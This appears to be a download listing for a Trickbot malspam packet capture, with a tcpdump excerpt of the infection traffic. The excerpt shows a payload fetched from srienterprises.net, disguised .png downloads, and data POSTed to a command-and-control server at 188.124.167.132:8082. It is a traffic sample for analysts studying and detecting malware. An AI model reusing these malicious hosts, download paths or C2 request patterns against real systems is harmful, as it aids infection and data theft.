Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

Download Attachments

  • 1 pcap 24
    Date added: May 24, 2019 12:02 am Added by: admin File size: 9 MB Downloads: 13

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0
2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0
2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0
2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0
2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229